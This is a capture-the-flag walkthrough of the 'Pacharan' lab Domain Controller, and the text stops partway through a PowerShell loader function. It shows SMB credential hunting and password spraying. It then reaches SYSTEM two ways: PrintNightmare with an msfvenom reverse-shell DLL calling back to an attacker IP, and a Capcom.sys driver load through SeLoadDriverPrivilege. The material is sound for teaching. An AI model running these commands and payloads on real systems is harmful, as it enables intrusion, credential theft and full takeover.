Pacharan – TheHackersLabs

  • OS: Linux
  • Difficulty: Easy
  • Platform: TheHackersLabs



Summary

“Pacharan” is an easy machine from the TheHackersLabs platform. A guest SMB session leaks a username and its password, which in turn unlock a share holding a list of candidate passwords. Spraying that list, plus a password hidden in a printer description, gives us a domain user who can log in over WinRM. That user holds SeLoadDriverPrivilege, which we abuse (loading the signed but vulnerable Capcom.sys driver) to become SYSTEM; the Print Spooler on the same host is also vulnerable to PrintNightmare, which provides a second path to SYSTEM.


User

Nmap reports the ports of a Domain Controller: 53 DNS, 88 Kerberos, 135 MS-RPC, 389/636 and 3268/3269 LDAP(S), 445 SMB and 5985 WinRM, among many others. The LDAP banner gives the domain name PACHARAN.THL:

❯ sudo nmap -sVC -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49668,49669,49670,49671,49672,49675,49681,49688 192.168.69.69 -oN targeted

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-17 05:56 -03
Nmap scan report for 192.168.69.69
Host is up (0.00025s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-17 03:57:17Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:F9:EA:71 (Oracle VirtualBox virtual NIC)
Service Info: Host: WIN-VRU3GG3DPLJ; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-09-17T03:58:11
|_  start_date: 2024-09-17T03:46:38
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: -5h00m01s
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:f9:ea:71 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.14 seconds

Note the clock skew of about five hours that Nmap reports: any Kerberos-based tooling used later needs the attacker clock aligned with the DC. Everything below authenticates with NTLM over SMB and WinRM, which does not care about skew.

For further enumeration we run enum4linux-ng. With the guest account and an empty password we get:

❯ python3 /home/gunzf0x/GitStuff/enum4linux-ng/enum4linux-ng.py 192.168.69.69 -u 'guest' -p ''

ENUM4LINUX - next generation

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 192.168.69.69
[*] Username ......... 'guest'
[*] Random Username .. 'zgjzuauv'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

 =====================================
|    Service Scan on 192.168.69.69    |
 =====================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 =====================================================
|    Domain Information via LDAP for 192.168.69.69    |
 =====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: PACHARAN.THL

<SNIP>

 ============================================================
|    Domain Information via SMB session for 192.168.69.69    |
 ============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: WIN-VRU3GG3DPLJ
NetBIOS domain name: PACHARAN
DNS domain: PACHARAN.THL
FQDN: WIN-VRU3GG3DPLJ.PACHARAN.THL
Derived membership: domain member
Derived domain: PACHARAN

<SNIP>

 =======================================
|    Shares via RPC on 192.168.69.69    |
 =======================================
[*] Enumerating shares
[+] Found 10 share(s):
ADMIN$:
  comment: Admin remota
  type: Disk
C$:
  comment: Recurso predeterminado
  type: Disk
IPC$:
  comment: IPC remota
  type: IPC
NETLOGON:
  comment: "Recurso compartido del servidor de inicio de sesi\xF3n"
  type: Disk
NETLOGON2:
  comment: ''
  type: Disk
PACHARAN:
  comment: ''
  type: Disk
PDF Pro Virtual Printer:
  comment: Soy Hacker y arreglo impresoras
  type: Printer
SYSVOL:
  comment: "Recurso compartido del servidor de inicio de sesi\xF3n"
  type: Disk
Users:
  comment: ''
  type: Disk
print$:
  comment: Controladores de impresora
  type: Disk
[*] Testing share ADMIN$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share C$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share NETLOGON
[+] Mapping: OK, Listing: DENIED
[*] Testing share NETLOGON2
[+] Mapping: OK, Listing: OK
[*] Testing share PACHARAN
[+] Mapping: OK, Listing: DENIED
[*] Testing share PDF Pro Virtual Printer
[-] Could not check share: STATUS_OBJECT_NAME_NOT_FOUND
[*] Testing share SYSVOL
[+] Mapping: OK, Listing: DENIED
[*] Testing share Users
[+] Mapping: OK, Listing: DENIED
[*] Testing share print$
[+] Mapping: OK, Listing: DENIED

<SNIP>

If we check what shares we have as guest user with NetExec we get:

❯ netexec smb 192.168.69.69 -u 'guest' -p '' --shares

SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\guest:
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [*] Enumerated shares
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  Share           Permissions     Remark
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  -----           -----------     ------
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  ADMIN$                          Admin remota
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  C$                              Recurso predeterminado
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  IPC$            READ            IPC remota
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  NETLOGON                        Recurso compartido del servidor de inicio de sesión
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  NETLOGON2       READ
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  PACHARAN
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  PDF Pro Virtual Printer                 Soy Hacker y arreglo impresoras
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  print$                          Controladores de impresora
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  SYSVOL                          Recurso compartido del servidor de inicio de sesión

NETLOGON2 is not a default share (NETLOGON and SYSVOL are the standard DC shares), and it is the only one the guest account can read.

Listing it with smbclient:

❯ smbclient -U guest% //192.168.69.69/NETLOGON2

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 31 13:25:34 2024
  ..                                  D        0  Wed Jul 31 13:25:34 2024
  Orujo.txt                           A       22  Wed Jul 31 13:25:55 2024

                7735807 blocks of size 4096. 4721853 blocks available
smb: \> get Orujo.txt
getting file \Orujo.txt of size 22 as Orujo.txt (7.2 KiloBytes/sec) (average 7.2 KiloBytes/sec)

This gives us a single file, Orujo.txt, whose content is:

❯ cat Orujo.txt

Pericodelospalotes6969

The file name looks like a username and its content like a password, so we check the pair against SMB with NetExec:

❯ netexec smb 192.168.69.69 -u 'orujo' -p 'Pericodelospalotes6969'
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\orujo:Pericodelospalotes6969

With valid credentials, we check which shares this account can read:

❯ netexec smb 192.168.69.69 -u 'orujo' -p 'Pericodelospalotes6969' --shares --filter-shares READ

SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\orujo:Pericodelospalotes6969
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [*] Enumerated shares
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  Share           Permissions     Remark
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  -----           -----------     ------
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  IPC$            READ            IPC remota
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  NETLOGON        READ            Recurso compartido del servidor de inicio de sesión
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  PACHARAN        READ

We can now read the PACHARAN share.

Listing that share with smbmap reveals a new file:

❯ smbmap -H 192.168.69.69 -u 'orujo' -p 'Pericodelospalotes6969' -r 'PACHARAN' --no-banner

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)

[+] IP: 192.168.69.69:445       Name: 192.168.69.69             Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Admin remota
        C$                                                      NO ACCESS       Recurso predeterminado
        IPC$                                                    READ ONLY       IPC remota
        NETLOGON                                                READ ONLY       Recurso compartido del servidor de inicio de sesión
        NETLOGON2                                               NO ACCESS
        PACHARAN                                                READ ONLY
        ./PACHARAN
        dr--r--r--                0 Wed Jul 31 13:21:13 2024    .
        dr--r--r--                0 Wed Jul 31 13:21:13 2024    ..
        fr--r--r--              921 Wed Jul 31 13:21:13 2024    ah.txt
        PDF Pro Virtual Printer                                 NO ACCESS       Soy Hacker y arreglo impresoras
        print$                                                  NO ACCESS       Controladores de impresora
        SYSVOL                                                  NO ACCESS       Recurso compartido del servidor de inicio de sesión
        Users                                                   NO ACCESS
[*] Closed 1 connections

We download it:

❯ smbmap -H 192.168.69.69 -u 'orujo' -p 'Pericodelospalotes6969' --download 'PACHARAN/ah.txt' --no-banner

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: PACHARAN\ah.txt (921 bytes)
[+] File output to: /home/gunzf0x/OtherMachines/TheHackersLabs/Pacharan/nmap/192.168.69.69-PACHARAN_ah.txt
[*] Closed 1 connections

Its content looks like a list of candidate passwords:

❯ cat 192.168.69.69-PACHARAN_ah.txt

Mamasoystreamer1!
Mamasoystreamer2@
Mamasoystreamer3#
Mamasoystreamer4$
Mamasoystreamer5%
Mamasoystreamer6^
Mamasoystreamer7&
<SNIP>
MamasoyStr5amer%
MamasoyStr6amer^
MamasoyStr7amer&
MamasoyStr8amer*
MamasoyStr9amer(
MamasoyStr10amer)
Mamasoystreamer1

Next we enumerate domain users over MS-RPC with rpcclient. The command below is shown with the Whisky credentials that the password spray further down produces; enumdomusers normally works with any authenticated domain account. The pipeline strips the rid:[...] part of each line and keeps only the username:

❯ rpcclient -U "Whisky%MamasoyStream2er@" 192.168.69.69 -c 'enumdomusers' | grep -o '\[.*\]' | sed 's/\[//;s/\]//' | awk -F 'rid' '{print $1}'

Administrador
Invitado
krbtgt
DefaultAccount
Orujo
Ginebra
Whisky
Hendrick
Chivas Regal
Whisky2
JB
Chivas
beefeater
CarlosV
RedLabel
Gordons

We can then password-spray the candidate list against these users. Before spraying a real domain, check the account lockout policy first (netexec smb <target> -u <user> -p <pass> --pass-pol) and keep the attempts per account below the threshold; a list this long against every user will lock accounts on a hardened domain. First, save the rpcclient output as a user list:

❯ rpcclient -U "Whisky%MamasoyStream2er@" 192.168.69.69 -c 'enumdomusers' | grep -o '\[.*\]' | sed 's/\[//;s/\]//' | awk -F 'rid' '{print $1}' > potential_users.txt

Then spray with NetExec, using the password list downloaded above (saved here as ah.txt):

❯ netexec smb 192.168.69.69 -u potential_users.txt -p ah.txt --continue-on-success | grep '\[+\]'

SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Whisky:MamasoyStream2er@

and we get one hit: Whisky:MamasoyStream2er@.

The share listing earlier showed a printer with a suspicious comment. Printers can be queried over MS-RPC as well, this time with rpcclient's enumprinters:

❯ rpcclient -U "Whisky%MamasoyStream2er@" 192.168.69.69 -c 'enumprinters'

        flags:[0x800000]
        name:[\\192.168.69.69\Soy Hacker y arreglo impresoras]
        description:[\\192.168.69.69\Soy Hacker y arreglo impresoras,Universal Document Converter,TurkisArrusPuchuchuSiu1]
        comment:[Soy Hacker y arreglo impresoras]

enumprinters reports the description as name,driver,location, so the last field, TurkisArrusPuchuchuSiu1, is the printer's Location attribute and looks like yet another password. We spray it against the user list:

❯ netexec smb 192.168.69.69 -u potential_users.txt -p 'TurkisArrusPuchuchuSiu1' | grep '\[+\]'

SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Chivas Regal:TurkisArrusPuchuchuSiu1

and we get credentials: Chivas Regal:TurkisArrusPuchuchuSiu1.

We check whether this user is allowed to log in over WinRM:

❯ netexec winrm 192.168.69.69 -u 'Chivas Regal' -p 'TurkisArrusPuchuchuSiu1'

WINRM       192.168.69.69   5985   WIN-VRU3GG3DPLJ  [*] Windows 10 / Server 2016 Build 14393 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL)
WINRM       192.168.69.69   5985   WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Chivas Regal:TurkisArrusPuchuchuSiu1 (Pwn3d!)

It is: the Pwn3d! tag marks a successful WinRM login.

We connect as this user with evil-winrm:

❯ evil-winrm -i 192.168.69.69 -u 'Chivas Regal' -p 'TurkisArrusPuchuchuSiu1'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents>

and read the user flag at this user’s Desktop.


NT Authority/System - Administrator

There are two ways to get SYSTEM on this machine.


Privesc #1: Use PrintNightmare

We can check whether the Print Spooler exposes the RPC interfaces that PrintNightmare (CVE-2021-34527) abuses. For this, we run:

❯ impacket-rpcdump @192.168.69.69 | grep -E 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol

Both MS-RPRN and MS-PAR are exposed, so the spooler's RPC interfaces are reachable remotely. That is a prerequisite rather than proof: PrintNightmare only works if the host is missing the July/August 2021 fixes or its Point and Print policy still lets non-administrators install printer drivers.
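Before uploading an exploit it is worth confirming on the target itself that the spooler is running and that the known mitigations are absent. The following check is an added example (not code from the page or from the Invoke-Nightmare project) meant to be pasted into the evil-winrm session. The registry values are the documented Point and Print policy settings; the 2021-07-06 cut-off used for the "unpatched" heuristic is an assumption based on when the PrintNightmare fixes shipped.

```powershell
# Added example: PrintNightmare pre-check to paste into the evil-winrm session. Not from the page or
# the Invoke-Nightmare project. Reports the spooler state, the Point and Print policy values and the
# newest hotfix, then derives a heuristic verdict.
function Test-PrintNightmareExposure {
    [CmdletBinding()]
    param()

    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $pnpKey  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'

    # Read one DWORD from the Point and Print policy key; $null when the key or value is absent
    $read = {
        param([string]$Name)
        try { (Get-ItemProperty -Path $pnpKey -Name $Name -ErrorAction Stop).$Name } catch { $null }
    }
    $restrict = & $read 'RestrictDriverInstallationToAdministrators'   # 0 re-allows non-admin driver installs
    $noWarn   = & $read 'NoWarningNoElevationOnInstall'                # 1 removes the elevation prompt
    $update   = & $read 'UpdatePromptSettings'                         # 1 or 2 weaken driver-update prompts

    # Newest hotfix with a parsable install date; no hotfix after July 2021 means the
    # PrintNightmare fixes are probably missing (assumption: cut-off 2021-07-06)
    $patchCutoff = Get-Date '2021-07-06'
    $lastFix = Get-HotFix | Where-Object { $_.InstalledOn } |
               Sort-Object InstalledOn -Descending | Select-Object -First 1
    $unpatched = (-not $lastFix) -or ($lastFix.InstalledOn -lt $patchCutoff)

    $spoolerUp  = ($null -ne $spooler) -and ($spooler.Status -eq 'Running')
    $policyWeak = ($restrict -eq 0) -or ($noWarn -eq 1) -or ($update -in 1, 2)

    [pscustomobject]@{
        SpoolerStatus                              = if ($spooler) { "$($spooler.Status) ($($spooler.StartType))" } else { 'not installed' }
        IsDomainController                         = (Get-CimInstance Win32_ComputerSystem).DomainRole -ge 4
        RestrictDriverInstallationToAdministrators = $restrict
        NoWarningNoElevationOnInstall              = $noWarn
        UpdatePromptSettings                       = $update
        LastHotfix                                 = if ($lastFix) { '{0} ({1:yyyy-MM-dd})' -f $lastFix.HotFixID, $lastFix.InstalledOn } else { 'none' }
        LikelyExposed                              = $spoolerUp -and ($unpatched -or $policyWeak)
    }
}

Test-PrintNightmareExposure | Format-List
```

A running spooler on a Domain Controller is a finding on its own, regardless of the verdict: Microsoft's guidance since 2021 is to disable the Print Spooler service on DCs.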

We can then use this PowerShell module for PrintNightmare (CVE-2021-34527.ps1, which exports Invoke-Nightmare) and upload it with the upload command of evil-winrm:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload CVE-2021-34527.ps1 .\printNightmare.ps1

Info: Uploading /home/gunzf0x/OtherMachines/TheHackersLabs/Pacharan/exploits/CVE-2021-34527.ps1 to C:\Users\Chivas Regal\Documents\.\printNightmare.ps1

Data: 238084 bytes of 238084 bytes copied

Info: Upload successful!

and import it:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> Import-Module .\printNightmare.ps1

Once imported, I try to add a new administrator user:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> Invoke-Nightmare -DriverName "Xerox" -NewUser "gunzf0x" -NewPassword "gunzf0x123$!"

[+] created payload at C:\Users\Chivas Regal\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\mxdwdrv.dll"
[+] added user gunzf0x as local administrator
[+] deleting payload from C:\Users\Chivas Regal\AppData\Local\Temp\nightmare.dll

Although the output claims the user was added, it is not there when listing the users, nor in the administrators group:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> net user

Cuentas de usuario de \\

-------------------------------------------------------------------------------
Administrador            beefeater                CarlosV
Chivas                   Chivas Regal             DefaultAccount
Ginebra                  Gordons                  Hendrick
Invitado                 JB                       krbtgt
Orujo                    RedLabel                 Whisky
Whisky2
El comando se ha completado con uno o más errores.

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> net localgroup administradores

Nombre de alias      administradores
Comentario           Los administradores tienen acceso completo y sin restricciones al equipo o dominio

Miembros

-------------------------------------------------------------------------------
Administrador
Administradores de empresas
Admins. del dominio
Se ha completado el comando correctamente.

Running it with the default options gives the same result: the script reports success (it even prints an empty username this time), but no user is created:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> Invoke-Nightmare

[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\Chivas Regal\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from C:\Users\Chivas Regal\AppData\Local\Temp\nightmare.dll

I think the problem is that the machine is in Spanish: the built-in payload presumably looks for the English group name Administrators, which does not exist here (the group is Administradores). In any case, the script evidently prints its success lines without verifying that the account exists, so its output cannot be trusted on its own.

The script's GitHub repository also documents a -DLL parameter that loads an arbitrary DLL instead of the built-in user-creation payload. So I build a reverse shell DLL with msfvenom on the attacker machine:

❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.69.2 LPORT=443 -f dll -o rev.dll

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: rev.dll

where 192.168.69.2 is the attacker IP address and 443 the port on which netcat will listen.

We upload it to the target, again with evil-winrm's upload command:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload rev.dll

Info: Uploading /home/gunzf0x/OtherMachines/TheHackersLabs/Pacharan/exploits/rev.dll to C:\Users\Chivas Regal\Documents\rev.dll

Data: 12288 bytes of 12288 bytes copied

Info: Upload successful!

Since the space in the Chivas Regal profile path could cause trouble when the spooler resolves the DLL path, I copy the file to another directory. From the AppLockerBypasses page I pick:

C:\Windows\System32\spool\drivers\color

which is one of the well-known directories under C:\Windows that standard users can write to by default, so there should be no permission problems there.

We then copy the malicious .dll file there with evil-winrm session:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> copy rev.dll C:\Windows\System32\spool\drivers\color\rev.dll

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> dir C:\Windows\System32\spool\drivers\color


    Directorio: C:\Windows\System32\spool\drivers\color


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/16/2016   3:18 PM           1058 D50.camp
-a----        7/16/2016   3:18 PM           1079 D65.camp
-a----        7/16/2016   3:18 PM            797 Graphics.gmmp
-a----        7/16/2016   3:18 PM            838 MediaSim.gmmp
-a----        7/16/2016   3:18 PM            786 Photo.gmmp
-a----        7/16/2016   3:18 PM            822 Proofing.gmmp
-a----        9/17/2024   7:13 AM           9216 rev.dll
-a----        7/16/2016   3:18 PM         218103 RSWOP.icm
-a----        7/16/2016   3:18 PM           3144 sRGB Color Space Profile.icm
-a----        7/16/2016   3:18 PM          17155 wscRGB.cdmp
-a----        7/16/2016   3:18 PM           1578 wsRGB.cdmp

I will then start a listener with netcat on port 443 in my attacker machine:

❯ nc -lvnp 443

listening on [any] 443 ...

On the victim, I run Invoke-Nightmare with -DLL pointing at the malicious DLL:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> Invoke-Nightmare -DLL 'C:\Windows\System32\spool\drivers\color\rev.dll'

[+] using user-supplied payload at C:\Windows\System32\spool\drivers\color\rev.dll
[!] ignoring NewUser and NewPassword arguments
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\mxdwdrv.dll"
[!] AddPrinterDriverEx failed
At line:1 char:1
+ Invoke-Nightmare -DLL 'C:\Windows\System32\spool\drivers\color\rev.dl ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Invoke-Nightmare

The call reports an error, but the netcat listener receives a connection anyway: the spooler loads the DLL, running its DllMain as SYSTEM, before the call fails, so the payload has already executed by the time AddPrinterDriverEx reports failure:

❯ nc -lvnp 443

listening on [any] 443 ...
connect to [192.168.69.2] from (UNKNOWN) [192.168.69.69] 58002
Microsoft Windows [Versión 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.

C:\Windows\system32>whoami

whoami
nt authority\system

We are nt authority\system. GG.


Privesc #2: Use SeLoadDriverPrivilege

Checking the privileges of the Chivas Regal user:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> whoami /priv

INFORMACIÓN DE PRIVILEGIOS
--------------------------

Nombre de privilegio          Descripción                                     Estado
============================= =============================================== ==========
SeMachineAccountPrivilege     Agregar estaciones de trabajo al dominio        Habilitada
SeLoadDriverPrivilege         Cargar y descargar controladores de dispositivo Habilitada
SeChangeNotifyPrivilege       Omitir comprobación de recorrido                Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso    Habilitada

SeLoadDriverPrivilege is enabled. This privilege lets its holder load a kernel driver through NtLoadDriver, and because the driver's service key may live under the user's own HKCU hive, no write access to HKLM is required. The remaining obstacle is Driver Signature Enforcement, so the standard trick is to load a legitimately signed but vulnerable driver, Capcom.sys, which lets user mode run arbitrary code in the kernel and steal the SYSTEM token.

This repository provides all the files needed (Capcom.sys and the ExploitCapcom.exe loader). Clone it on the attacker machine and upload both files with evil-winrm, again into the color directory. One caveat: on recent Windows builds that enforce Microsoft's vulnerable driver blocklist (for example with HVCI on), Capcom.sys will refuse to load; this Server 2016 build 14393 has no such protection.

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload Capcom.sys C:\Windows\System32\spool\drivers\color\Capcom.sys

Info: Uploading /home/gunzf0x/HTB/HTBMachines/Medium/Fuse/exploits/SeLoadDriverPrivilege/Capcom.sys to C:\Windows\System32\spool\drivers\color\Capcom.sys

Data: 14100 bytes of 14100 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload ExploitCapcom.exe C:\Windows\System32\spool\drivers\color\ExploitCapcom.exe

Info: Uploading /home/gunzf0x/HTB/HTBMachines/Medium/Fuse/exploits/SeLoadDriverPrivilege/ExploitCapcom.exe to C:\Windows\System32\spool\drivers\color\ExploitCapcom.exe

Data: 387752 bytes of 387752 bytes copied

Info: Upload successful!

Then load the driver with the LOAD command. Note the registry path in the output: the tool registered the driver under the user's own hive, \Registry\User\<SID>\..., which is exactly why SeLoadDriverPrivilege alone is enough (the rest of the path is not rendered correctly in the console):

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> C:\Windows\System32\spool\drivers\color\ExploitCapcom.exe LOAD C:\Windows\System32\spool\drivers\color\Capcom.sys

[*] Service Name: aabvavbo
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-3046175042-3013395696-775018414-1108\?????????????????
NTSTATUS: 00000000, WinError: 0

To verify that the driver loaded and the kernel bug is reachable, run whoami through the EXPLOIT command:

*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> C:\Windows\System32\spool\drivers\color\ExploitCapcom.exe EXPLOIT whoami

[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 00000216F7BE0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed
nt authority\system

The command runs and prints nt authority\system, so we are executing commands as SYSTEM.
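What the LOAD step did is worth spelling out, since it is the whole reason SeLoadDriverPrivilege is equivalent to administrator: NtLoadDriver takes a registry path to a service key, and with this privilege the caller may point it at a key under its own user hive (\Registry\User\<SID>\..., which is what HKCU maps to), so no write access to HKLM\SYSTEM is needed. The following PowerShell is an added example, not code from the page or from the ExploitCapcom tool. It registers and loads the same Capcom.sys from the color directory using nothing but NtLoadDriver; the service name capcomsvc is an arbitrary assumption. It only loads the driver; triggering the Capcom.sys bug to run shellcode is what the EXPLOIT command above does.

```powershell
# Added example: manual driver load via SeLoadDriverPrivilege (what ExploitCapcom.exe LOAD does
# internally). Not code from the page or the tool. Assumes Capcom.sys is already on disk and that
# the current user's hive is loaded (true inside a WinRM session).
$ntLoaderSource = @'
using System;
using System.Runtime.InteropServices;
public static class NtLoader {
    [StructLayout(LayoutKind.Sequential)]
    public struct UNICODE_STRING { public ushort Length; public ushort MaximumLength; public IntPtr Buffer; }
    [DllImport("ntdll.dll")] static extern int RtlAdjustPrivilege(uint privilege, byte enable, byte currentThread, out byte wasEnabled);
    [DllImport("ntdll.dll")] static extern int NtLoadDriver(ref UNICODE_STRING driverServiceName);
    [DllImport("ntdll.dll")] static extern int NtUnloadDriver(ref UNICODE_STRING driverServiceName);
    const uint SE_LOAD_DRIVER_PRIVILEGE = 10;
    // Enables SeLoadDriverPrivilege in the process token, then (un)loads the driver named by serviceKey.
    public static int Call(string serviceKey, bool unload) {
        byte wasEnabled;
        int status = RtlAdjustPrivilege(SE_LOAD_DRIVER_PRIVILEGE, 1, 0, out wasEnabled);
        if (status != 0) return status;
        UNICODE_STRING us;
        us.Buffer = Marshal.StringToHGlobalUni(serviceKey);
        us.Length = (ushort)(serviceKey.Length * 2);
        us.MaximumLength = (ushort)(us.Length + 2);
        try { return unload ? NtUnloadDriver(ref us) : NtLoadDriver(ref us); }
        finally { Marshal.FreeHGlobal(us.Buffer); }
    }
}
'@

function Invoke-UserHiveDriverLoad {
    param(
        [Parameter(Mandatory)][string]$DriverPath,
        [string]$ServiceName = 'capcomsvc',   # assumption: any name works, it only names the key
        [switch]$Unload
    )
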